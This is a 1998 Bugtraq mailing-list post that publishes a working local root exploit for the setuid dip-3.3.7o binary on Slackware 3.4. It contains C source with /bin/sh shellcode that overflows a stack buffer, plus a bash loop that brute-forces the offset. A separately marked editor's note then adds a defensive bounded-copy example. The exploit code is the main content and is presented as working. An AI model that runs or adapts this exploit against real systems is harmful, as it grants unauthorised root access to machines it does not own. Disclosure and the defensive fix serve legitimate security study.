Bugtraq mailing list archives
dip-3.3.7o exploit
From: zef () PROMISC NET (zef)
Date: Fri, 8 May 1998 01:14:21 +0000
The following code causes a buffer overrun in dip-3.3.7o that comes with Linux Slackware version 3.4 and maybe others. It can give you root permission if the dip file is owned by root and the set-user-id bit is set. This problem was mentioned in this list some days ago by Goran Gajic, and he has also posted some possible ways to correct it.

The code is too messy... but it works.

Regards,
zef

------------------------------ dipr.c -----------------------------
/*
 * dip-3.3.7o buffer overrun 07 May 1998
 *
 * sintax: ./dipr <offset>
 *
 * offset: try increments of 50 between 1500 and 3000
 *
 * tested in linux with dip version 3.3.7o (slak 3.4).
 *
 * by zef and r00t @promisc.net
 *
 * http://www.promisc.net
 */

#include <stdio.h>
#include <stdlib.h>

static inline getesp()
{
  __asm__(" movl %esp,%eax ");
}

main(int argc, char **argv)
{
  int jump,i,n;
  unsigned long xaddr;
  char *cmd[5], buf[4096];
  char code[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

  jump=atoi(argv[1]);

  for (i=0;i<68;i++) buf[i]=0x41;
  for (n=0,i=68;i<113;i++) buf[i]=code[n++];

  xaddr=getesp()+jump;

  buf[i]=xaddr & 0xff;
  buf[i+1]=(xaddr >> 8) & 0xff;
  buf[i+2]=(xaddr >> 16) & 0xff;
  buf[i+3]=(xaddr >> 24) & 0xff;
  buf[i+4]=xaddr & 0xff;
  buf[i+5]=(xaddr >> 8) & 0xff;
  buf[i+6]=(xaddr >> 16) & 0xff;
  buf[i+6]=(xaddr >> 16) & 0xff;
  buf[i+7]=(xaddr >> 24) & 0xff;

  cmd[0]=malloc(17); strcpy(cmd[0],"/sbin/dip-3.3.7o");
  cmd[1]=malloc(3);  strcpy(cmd[1],"-k");
  cmd[2]=malloc(3);  strcpy(cmd[2],"-l");
  cmd[3]=buf;
  cmd[4]=NULL;

  execve(cmd[0],cmd,NULL);
}
------------------------------- end -------------------------------

Shell script for easy testing :-)

---------------------------- dipr.test ----------------------------
#/bin/bash
if [ ! -x /sbin/dip-3.3.7o ]
then
  echo "could not find file \"/sbin/dip-3.3.7o\"";
  exit -1
fi
if [ ! -u /sbin/dip-3.3.7o ]
then
  echo "dip executable is not suid"
  exit -1
fi
if [ ! -x ./dipr ]
then
  echo "could not find file \"./dipr\"";
  echo "try compiling dipr.c"
  exit -1
fi
x=2000
false
while [ $x -lt 3000 -a $? -ne 0 ]
do
  echo offset=$x
  x=$[x+50]
  ./dipr $x
done
rm -f core
------------------------------- end -------------------------------
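Editor's note: the following is an added example and is not part of zef's post, nor dip's own source code. It illustrates the defect class the post exploits, a fixed-size stack buffer filled from a command-line option value with no length check, and the bounded-copy form that closes it: a value that does not fit is rejected outright rather than truncated or copied past the end of the buffer. The option name, the buffer size and the function names are assumptions made for the example only.

```c
/* Added example: not dip's code. Shows the bug class behind the post
 * (unchecked copy of an argv value into a fixed-size buffer) and the
 * bounded alternative a setuid program should use. Sizes and names are
 * assumptions for illustration. */
#include <stdio.h>
#include <string.h>

#define OPT_VALUE_MAX 64   /* assumed size of the option-value buffer */

/* Bounded copy: returns 0 on success, -1 if src (plus its NUL) does not
 * fit in dst. It never writes more than dstlen bytes and never truncates
 * silently, so an over-long value is a visible error, not an overflow. */
int copy_bounded(char *dst, size_t dstlen, const char *src)
{
    size_t n = strlen(src);
    if (dstlen == 0 || n >= dstlen)
        return -1;
    memcpy(dst, src, n + 1);   /* n + 1 copies the terminating NUL */
    return 0;
}

/* Handles a hypothetical "-l <value>" option. The vulnerable pattern would
 * be strcpy(name, value); here the value is accepted only if it fits.
 * Returns 1 if the value was accepted, 0 if it was rejected. */
int handle_l_option(const char *value)
{
    char name[OPT_VALUE_MAX];

    if (copy_bounded(name, sizeof name, value) != 0) {
        fprintf(stderr, "option value too long (max %d bytes)\n",
                OPT_VALUE_MAX - 1);
        return 0;
    }
    /* name is now a well-formed, NUL-terminated string of < OPT_VALUE_MAX
     * bytes and can be used safely by the rest of the program. */
    return 1;
}

int main(void)
{
    char small[] = "ppp0";            /* constructed input: fits */
    char big[OPT_VALUE_MAX * 2];      /* constructed input: too long */

    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\0';

    printf("short value accepted: %d\n", handle_l_option(small));
    printf("long value accepted:  %d\n", handle_l_option(big));
    return 0;
}
```

The check is deliberately strict (`n >= dstlen` rejects a value that would exactly fill the buffer without room for the NUL), which is the off-by-one that `strncpy`-style fixes often get wrong.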